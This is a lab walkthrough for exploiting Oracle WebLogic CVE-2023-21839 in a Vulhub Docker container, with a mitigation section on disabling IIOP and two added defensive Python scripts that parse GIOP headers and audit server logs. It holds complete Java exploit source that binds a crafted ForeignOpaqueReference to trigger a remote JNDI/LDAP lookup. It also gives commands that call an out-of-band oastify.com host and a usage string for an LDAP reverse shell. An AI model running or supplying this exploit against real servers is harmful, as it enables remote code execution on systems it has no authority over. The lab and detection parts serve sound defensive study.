IIOP is a TCP/IP protocol stack that implements the GIOP protocol, allowing CORBA objects to communicate and interact over the Internet.
RMI-IIOP is an implementation of the Java remote method invocation (RMI) protocol that extends IIOP with the ability to call remote Java objects through RMI.
Notes on the Go exploit used below:
- No Java dependency is required: the protocol is constructed by hand and RCE is achieved directly over a socket.
- The IIOP NAT network problem has been solved (Docker and public-network targets can be tested).
- Tested on Windows, macOS and Linux against WebLogic 12 and 14.
- Start WebLogic with JDK 8u191 or below, and set up the JNDI server yourself.
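Because IIOP is just GIOP carried over TCP, every IIOP message starts with the 12-byte GIOP header, which is what a network sensor can key on to notice that a client is speaking IIOP to a port that was only meant to serve HTTP. The following parser is an added example (not code from the page or from the exploit's author); the header layout follows the CORBA GIOP specification, and the byte stream it runs over is constructed inline, not a real capture.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# GIOP message header (CORBA spec, 12 bytes): magic, version, flags, message type, body size.
# IIOP is GIOP carried over TCP, so this header opens every IIOP message.
GIOP_MAGIC = b"GIOP"
GIOP_HEADER_LEN = 12
MESSAGE_TYPES = {
    0: "Request", 1: "Reply", 2: "CancelRequest", 3: "LocateRequest",
    4: "LocateReply", 5: "CloseConnection", 6: "MessageError", 7: "Fragment",
}


@dataclass
class GiopHeader:
    major: int
    minor: int
    little_endian: bool
    message_type: str
    message_size: int  # body length that follows the 12-byte header


def parse_giop_header(data: bytes) -> Optional[GiopHeader]:
    """Return the parsed header if `data` starts with a well-formed GIOP header, else None."""
    if len(data) < GIOP_HEADER_LEN or data[:4] != GIOP_MAGIC:
        return None
    major, minor, flags, mtype = data[4:8]
    if major != 1 or minor > 2 or mtype not in MESSAGE_TYPES:
        return None
    # GIOP 1.0 stores a boolean byte_order here; 1.1+ uses bit 0 of a flags byte. Same bit either way.
    little_endian = bool(flags & 0x01)
    (size,) = struct.unpack("<I" if little_endian else ">I", data[8:12])
    return GiopHeader(major, minor, little_endian, MESSAGE_TYPES[mtype], size)


def scan_stream(data: bytes) -> List[GiopHeader]:
    """Walk a captured TCP stream and return every GIOP header found, in order.
    Stops at the first position that is not a GIOP header or whose message is truncated."""
    headers = []
    pos = 0
    while pos < len(data):
        hdr = parse_giop_header(data[pos:])
        if hdr is None or pos + GIOP_HEADER_LEN + hdr.message_size > len(data):
            break
        headers.append(hdr)
        pos += GIOP_HEADER_LEN + hdr.message_size
    return headers


def iiop_in_use(data: bytes) -> bool:
    """True if the stream opens with a GIOP Request or LocateRequest, i.e. a client speaking IIOP."""
    hdr = parse_giop_header(data)
    return hdr is not None and hdr.message_type in ("Request", "LocateRequest")


# Constructed sample stream (not a real capture): a GIOP 1.2 big-endian Request with a 16-byte
# body, followed by a GIOP 1.0 little-endian LocateRequest with an 8-byte body.
SAMPLE_STREAM = (
    GIOP_MAGIC + bytes([1, 2, 0x00, 0]) + struct.pack(">I", 16) + b"\x00" * 16
    + GIOP_MAGIC + bytes([1, 0, 0x01, 3]) + struct.pack("<I", 8) + b"\x00" * 8
)
# Constructed plain HTTP request to the same port, which must not be mistaken for IIOP.
HTTP_SAMPLE = b"GET / HTTP/1.1\r\nHost: 127.0.0.1:7001\r\n\r\n"

if __name__ == "__main__":
    for h in scan_stream(SAMPLE_STREAM):
        print(f"GIOP {h.major}.{h.minor} {h.message_type} size={h.message_size} "
              f"{'LE' if h.little_endian else 'BE'}")
    print("IIOP in sample:", iiop_in_use(SAMPLE_STREAM), "| in HTTP:", iiop_in_use(HTTP_SAMPLE))
```

The byte-order flag matters: WebLogic and other ORBs may send either endianness, so reading `message_size` with the wrong order desynchronises the scan. A sensor that sees GIOP Requests arriving on 7001 from outside the application tier has found the exposure that the rest of this page exploits.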
Exploiting VulnHub 12.2.1.3-2018
» docker pull vulhub/weblogic:12.2.1.3-2018
» docker run -d -p 7001:7001 -p 9002:9002 --name weblogic-vulnhub-12213-2018 --hostname weblogic-vulnhub-12213-2018 --ulimit nofile=1024:65536 -v $PWD:/u01/oracle/properties vulhub/weblogic:12.2.1.3-2018
» docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
bc98f59ca86d vulhub/weblogic:12.2.1.3-2018 "/u01/oracle/createA…" About an hour ago Up About an hour 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp weblogic-vulnhub-12213-2018
» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 7:28:10,575 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.runtime.>
<Oct 7, 2024 7:28:10,722 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.domainruntime.>
<Oct 7, 2024 7:28:10,728 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.edit.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <WebLogicServer> <BEA-000331> <Started the WebLogic Server Administration Server "AdminServer" for domain "base_domain" running in development mode.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.>
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.>
<Oct 7, 2024 7:28:11,565 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.>
» nmap -Pn -n -p7001 127.0.0.1 -sC
PORT STATE SERVICE
7001/tcp open afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.2.1.3)
Clone repo and build exploit:
apt :: ~ » git clone https://github.com/0xPThree/WebLogic
apt :: ~ » cd WebLogic/cve-2023-21839/cmd
apt :: WebLogic/cve-2023-21839/cmd ‹main› » go build -o CVE-2023-21839
apt :: WebLogic/cve-2023-21839/cmd ‹main*› » ls -al
total 2964
drwxrwxr-x 2 void void 4096 Oct 7 11:07 .
drwxrwxr-x 3 void void 4096 Oct 7 11:07 ..
-rwxrwxr-x 1 void void 3009295 Oct 7 11:07 CVE-2023-21839
-rw-rw-r-- 1 void void 11475 Oct 7 11:07 main.go
Run the exploit:
Response in Burp Collaborator:
Running the exploit against a patched target we get the following error:
A panic or any other error means the target is not vulnerable. In this example it is because IIOP is disabled on the server.
Java - T3
WebLogic's implementation of the RMI specification uses a proprietary protocol known as T3. You can think of T3 (and secure T3S) as a layer to expose/allow JNDI calls by clients.
T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.
Exploiting from WebLogic 12.2.1.4 container
## Create base file (wlfullclient.jar)
[oracle@12214-weblogic lib]$ java -jar /u01/oracle/wlserver/modules/com.bea.core.jarbuilder.jar
Creating new jar file: wlfullclient.jar
## Upload payload to container
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/CVE_2023_21839.java
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/META-INF/MANIFEST.MF
[oracle@12214-weblogic lib]$ mkdir META-INF
[oracle@12214-weblogic lib]$ mv MANIFEST.MF META-INF/
## Create .class file
[oracle@12214-weblogic lib]$ mv wlfullclient.jar CVE_2023_21839.jar
[oracle@12214-weblogic lib]$ javac -cp CVE_2023_21839.jar CVE_2023_21839.java
[oracle@12214-weblogic lib]$ ls | grep CVE_2023_21839
CVE_2023_21839.class
CVE_2023_21839.jar
CVE_2023_21839.java
## Update base file with payload
[oracle@12214-weblogic lib]$ jar -uvf CVE_2023_21839.jar CVE_2023_21839.class
[oracle@12214-weblogic lib]$ jar -uvfm CVE_2023_21839.jar META-INF/MANIFEST.MF
## Execute exploit
[oracle@12214-weblogic lib]$ java -jar CVE_2023_21839.jar localhost:7001 ldap://zmpnx0cd2tzgorszf6mmfdt21t7kvkj9.oastify.com
## Java version
[oracle@12214-weblogic lib]$ java -version
java version "1.8.0_411"
Java(TM) SE Runtime Environment (build 1.8.0_411-b60)
Java HotSpot(TM) 64-Bit Server VM (build 25.411-b60, mixed mode)
// CVE_2023_21839.java
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;

public class CVE_2023_21839 {
    static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE = "[*] e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    // Obtain a WebLogic JNDI context over T3 for the given provider URL.
    private static InitialContext getInitialContext(String url) throws NamingException {
        Hashtable<String, String> env = new Hashtable<>();
        env.put("java.naming.factory.initial", JNDI_FACTORY);
        env.put("java.naming.provider.url", url);
        return new InitialContext(env);
    }

    public static void main(String[] args) throws Exception {
        if (args.length < 2) {
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c = getInitialContext("t3://" + t3Url);

        Hashtable<String, String> env = new Hashtable<>();
        env.put("java.naming.factory.initial", "com.sun.jndi.rmi.registry.RegistryContextFactory");

        // Populate the private fields of ForeignOpaqueReference via reflection.
        ForeignOpaqueReference f = new ForeignOpaqueReference();
        Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f, env);
        Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f, ldapUrl);

        // Bind the reference under a random name, then look it up to trigger it.
        String bindName = (new Random(System.currentTimeMillis())).nextLong() + "";
        try {
            c.bind(bindName, f);
            c.lookup(bindName);
        } catch (Exception exception) {}
    }
}
Running the exploit with IIOP disabled on the server, we now get the following error:
Reading the logs shows the reason: "the incoming protocol iiop is not enabled". The attack vector has been eliminated.
» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 8:51:07,332 AM GMT> <Warning> <Socket> <BEA-000443> <The connection attempt was rejected because the incoming protocol iiop is not enabled on channel Default[iiop].>
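The two log messages that bracket this page, BEA-002613 (which protocols a channel listens for) and BEA-000443 (a rejected connection on a disabled protocol), are enough to verify the mitigation and to alert on continued attempts. The following checker is an added example, not code from the page or from Oracle; it parses the generic WebLogic server-log layout and the message texts exactly as they appear above. The "before" sample lines are copied from this page; the "after" lines for a hardened channel are constructed for illustration and assume BEA-002613 keeps the same wording when only http remains enabled.

```python
import re
from collections import Counter
from ipaddress import ip_address
from typing import Dict, List, Optional

# WebLogic server-log record: <timestamp> <severity> <subsystem> <BEA-id> <message>
LOG_RE = re.compile(r"^<([^>]+)> <([^>]+)> <([^>]+)> <(BEA-\d+)> <(.*)>$")
# BEA-002613 message text as logged on this page:
#   Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.
LISTEN_RE = re.compile(r'Channel "([^"]+)" is now listening on ([^:\s]+):(\d+) for protocols ([^.]+)\.')
# BEA-000443 message text as logged on this page:
#   ... the incoming protocol iiop is not enabled on channel Default[iiop].
REJECT_RE = re.compile(r"incoming protocol (\w+) is not enabled on channel ([^.]+)\.")


def parse_log_line(line: str) -> Optional[dict]:
    """Split one server-log record into its fields, or return None for non-record lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, severity, subsystem, code, message = m.groups()
    return {"ts": ts, "severity": severity, "subsystem": subsystem, "code": code, "message": message}


def channel_listeners(lines) -> Dict[str, dict]:
    """Map channel name -> address/port/protocol set from BEA-002613 records (last record wins)."""
    channels: Dict[str, dict] = {}
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["code"] != "BEA-002613":
            continue
        m = LISTEN_RE.search(rec["message"])
        if not m:
            continue
        name, addr, port, protos = m.groups()
        channels[name] = {"address": addr, "port": int(port),
                          "protocols": {p.strip() for p in protos.split(",")}}
    return channels


def rejected_protocols(lines) -> Counter:
    """Count BEA-000443 rejections per protocol: evidence that someone is still probing a disabled protocol."""
    counts: Counter = Counter()
    for line in lines:
        rec = parse_log_line(line)
        if rec and rec["code"] == "BEA-000443":
            m = REJECT_RE.search(rec["message"])
            if m:
                counts[m.group(1)] += 1
    return counts


def _is_loopback(addr: str) -> bool:
    try:
        return ip_address(addr).is_loopback
    except ValueError:  # hostname rather than a literal address: treat as reachable
        return False


def audit(lines, risky=("iiop", "t3", "t3s")) -> List[str]:
    """Report channels bound to non-loopback addresses that still accept IIOP/T3."""
    findings = []
    for name, ch in channel_listeners(lines).items():
        if _is_loopback(ch["address"]):
            continue
        exposed = sorted(ch["protocols"] & set(risky))
        if exposed:
            findings.append(f'channel "{name}" on {ch["address"]}:{ch["port"]} exposes {", ".join(exposed)}')
    return findings


# Sample records copied from the page's container logs (vulnerable state).
SAMPLE_BEFORE = [
    '<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.>',
    '<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.>',
]
# Constructed records for the hardened state: the channel line is illustrative, the rejection is from the page.
SAMPLE_AFTER = [
    '<Oct 7, 2024 8:50:00,000 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols http.>',
    '<Oct 7, 2024 8:51:07,332 AM GMT> <Warning> <Socket> <BEA-000443> <The connection attempt was rejected because the incoming protocol iiop is not enabled on channel Default[iiop].>',
]

if __name__ == "__main__":
    print("before:", audit(SAMPLE_BEFORE), dict(rejected_protocols(SAMPLE_BEFORE)))
    print("after: ", audit(SAMPLE_AFTER), dict(rejected_protocols(SAMPLE_AFTER)))
```

Run it over the server log after each configuration change: an empty `audit` result confirms that no externally bound channel still lists iiop or t3, and a non-zero `rejected_protocols` count after the change is a useful alert, since legitimate clients should not be speaking IIOP to that channel at all.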